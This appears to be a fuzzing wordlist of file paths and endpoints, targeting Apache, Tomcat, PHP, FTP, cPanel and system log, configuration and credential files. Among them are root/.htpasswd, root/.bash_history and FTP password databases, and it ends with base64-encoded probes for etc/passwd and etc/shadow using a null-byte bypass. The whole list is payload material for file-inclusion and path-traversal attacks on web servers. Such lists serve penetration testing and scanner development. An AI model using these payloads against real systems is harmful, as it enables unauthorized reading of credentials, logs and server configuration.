Program Files\Apache Group\Apache\conf\httpd.conf
Program Files\Apache Group\Apache\logs\access.log
Program Files\Apache Group\Apache\logs\error.log
Program Files\Apache Group\Apache2\conf\httpd.conf
Program Files\xampp\apache\conf\httpd.conf
RELEASE-NOTES.txt
reload
remove
resources
roles
ROOT
root/.bash_history
root/.bash_logut
root/.htpasswd
root/.ksh_history
root/.Xauthority
save
server-info
server-status
serverinfo
servlet/default
servlet/default/
servlet/mstrWebAdmin
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/
servlet/org.apache.catalina.servlets.DefaultServlet/
servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
servlet/org.apache.catalina.servlets.HTMLManagerServlet
servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet
servlet/org.apache.catalina.servlets.ManagerServlet
servlet/org.apache.catalina.servlets.SnoopAllServlet
servlet/org.apache.catalina.servlets.WebdavServlet/
servlets-examples
sessions
shared/
shared/lib/
site.conf
smarty.conf
smb.conf
start
status
status/*
stop
svnserve.conf
test-cgi
test.conf
tidy.conf
tmp
tomcat-docs
undeploy
user/.htpasswd
users.db.php
users/.htpasswd
usr/apache/conf/httpd.conf
usr/apache2/conf/httpd.conf
usr/etc/pure-ftpd.conf
usr/lib/cron/log
usr/lib/php.ini
usr/lib/php/php.ini
usr/lib/security/mkuser.default
usr/local/apache/conf/httpd.conf
usr/local/apache/conf/php.ini
usr/local/apache/httpd.conf
usr/local/apache/log
usr/local/apache/logs
usr/local/apache/logs/access_ log
usr/local/apache/logs/access_log
usr/local/apache/logs/access_log 
usr/local/apache/logs/access. log
usr/local/apache/logs/access.log
usr/local/apache/logs/access.log 
usr/local/apache/logs/error_log
usr/local/apache/logs/error_log 
usr/local/apache/logs/error.log
usr/local/apache/logs/error.log 
usr/local/apache2/conf/httpd.conf
usr/local/apache2/httpd.conf
usr/local/apache2/logs/access_log
usr/local/apache2/logs/access.log
usr/local/apache2/logs/error_log
usr/local/apache2/logs/error.log
usr/local/apps/apache/conf/httpd.conf
usr/local/apps/apache2/conf/httpd.conf
usr/local/cpanel/logs
usr/local/cpanel/logs/access_log
usr/local/cpanel/logs/error_log
usr/local/cpanel/logs/license_log
usr/local/cpanel/logs/login_log
usr/local/cpanel/logs/stats_log
usr/local/etc/apache/conf/httpd.conf
usr/local/etc/apache/vhosts.conf
usr/local/etc/apache2/conf/httpd.conf
usr/local/etc/httpd/conf/httpd.conf
usr/local/etc/httpd/logs/access_log
usr/local/etc/httpd/logs/error_log
usr/local/etc/php.ini
usr/local/etc/pure-ftpd.conf
usr/local/etc/pureftpd.pdb
usr/local/httpd/conf/httpd.conf
usr/local/lib/php.ini
usr/local/php/httpd.conf
usr/local/php/httpd.conf.php
usr/local/php/lib/php.ini
usr/local/php4/httpd.conf
usr/local/php4/httpd.conf.php
usr/local/php4/lib/php.ini
usr/local/php5/httpd.conf
usr/local/php5/httpd.conf.php
usr/local/php5/lib/php.ini
usr/local/pureftpd/etc/pure-ftpd.conf
usr/local/pureftpd/etc/pureftpd.pdb
usr/local/pureftpd/sbin/pure-config.pl
usr/local/www/logs/thttpd_log
usr/local/Zend/etc/php.ini
usr/pkgsrc/net/pureftpd/
usr/ports/contrib/pure-ftpd/
usr/ports/ftp/pure-ftpd/
usr/ports/net/pure-ftpd/
usr/sbin/pure-config.pl
usr/spool/lp/log
usr/spool/mqueue/syslog
var/adm
var/adm/acct/sum/loginlog
var/adm/aculog
var/adm/aculogs
var/adm/crash/unix
var/adm/crash/vmcore
var/adm/cron/log
var/adm/dtmp
var/adm/lastlog
var/adm/lastlog/username
var/adm/log/asppp.log
var/adm/log/xferlog
var/adm/loginlog
var/adm/lp/lpd-errs
var/adm/messages
var/adm/pacct
var/adm/qacct
var/adm/ras/bootlog
var/adm/ras/errlog
var/adm/sulog
var/adm/SYSLOG
var/adm/utmp
var/adm/utmpx
var/adm/vold.log
var/adm/wtmp
var/adm/wtmpx
var/adm/X0msgs
var/apache/log
var/apache/logs
var/apache/logs/access_log
var/apache/logs/error_log
var/cpanel/cpanel.config
var/cron/log
var/lib/mlocate/mlocate.db
var/lib/mysql/my.cnf
var/local/www/conf/php.ini
var/lock/samba
var/log
var/log/access_log
var/log/access_log 
var/log/access.log
var/log/access.log 
var/log/acct
var/log/apache-ssl/access.log
var/log/apache-ssl/error.log
var/log/apache/access_log
var/log/apache/access_log 
var/log/apache/access.log
var/log/apache/access.log 
var/log/apache/error_log
var/log/apache/error_log 
var/log/apache/error.log
var/log/apache/error.log 
var/log/apache2/access_log
var/log/apache2/access_log 
var/log/apache2/access.log
var/log/apache2/access.log 
var/log/apache2/error_log
var/log/apache2/error_log 
var/log/apache2/error.log
var/log/apache2/error.log 
var/log/auth
var/log/auth.log
var/log/authlog
var/log/boot.log
var/log/cron.log
var/log/dmesg
var/log/error_log
var/log/error_log 
var/log/error.log
var/log/error.log 
var/log/exim_mainlog
var/log/exim_paniclog
var/log/exim_rejectlog
var/log/exim/mainlog
var/log/exim/paniclog
var/log/exim/rejectlog
var/log/ftp-proxy
var/log/ftp-proxy/ftp-proxy.log
var/log/ftplog
var/log/httpd/
var/log/httpd/access_log
var/log/httpd/access.log
var/log/httpd/error_log
var/log/httpd/error.log
var/log/httpsd/ssl_log
var/log/httpsd/ssl.access_log
var/log/kern.log
var/log/lastlog
var/log/lighttpd
var/log/maillog
var/log/message
var/log/messages
var/log/mysql.log
var/log/mysql/mysql-bin.log
var/log/mysql/mysql-slow.log
var/log/mysql/mysql.log
var/log/mysqld.log
var/log/mysqlderror.log
var/log/ncftpd.errs
var/log/ncftpd/misclog.txt
var/log/news
var/log/news.all
var/log/news/news
var/log/news/news.all
var/log/news/news.crit
var/log/news/news.err
var/log/news/news.notice
var/log/news/suck.err
var/log/news/suck.notice
var/log/poplog
var/log/proftpd
var/log/proftpd.access_log
var/log/proftpd.xferlog
var/log/proftpd/xferlog.legacy
var/log/pure-ftpd/pure-ftpd.log
var/log/pureftpd.log
var/log/qmail
var/log/qmail/
var/log/samba
var/log/samba-log.%m
var/log/secure
var/log/smtpd
var/log/spooler
var/log/syslog
var/log/telnetd
var/log/thttpd_log
var/log/utmp
var/log/vsftpd.log
var/log/wtmp
var/log/xferlog
var/log/yum.log
var/lp/logs/lpNet
var/lp/logs/lpsched
var/lp/logs/requests
var/mysql.log
var/run/httpd.pid
var/run/mysqld/mysqld.pid
var/run/utmp
var/saf/_log
var/saf/port/log
var/spool/errors
var/spool/locks
var/spool/logs
var/spool/tmp
var/www/conf/httpd.conf
var/www/html/.htaccess
var/www/localhost/htdocs/.htaccess
var/www/log/access_log
var/www/log/error_log
var/www/logs/access_log
var/www/logs/access_log 
var/www/logs/access.log
var/www/logs/access.log 
var/www/logs/error_log
var/www/logs/error_log 
var/www/logs/error.log
var/www/logs/error.log 
var/www/sitename/htdocs/
var/www/vhosts/sitename/httpdocs/.htaccess
var/www/web1/html/.htaccess
Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
Volumes/webBackup/opt/apache2/conf/httpd.conf
Volumes/webBackup/private/etc/httpd/httpd.conf
Volumes/webBackup/private/etc/httpd/httpd.conf.default
WEB-INF/
WEB-INF/classes/
WEB-INF/web.xml
web/conf/php.ini
webdav
webdav/index.html
webdav/servlet/org.apache.catalina.servlets.WebdavServlet/
webdav/servlet/webdav/
WINDOWS\php.ini
WINNT\php.ini
www/logs/proftpd.system.log
xampp\apache\bin\php.ini
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==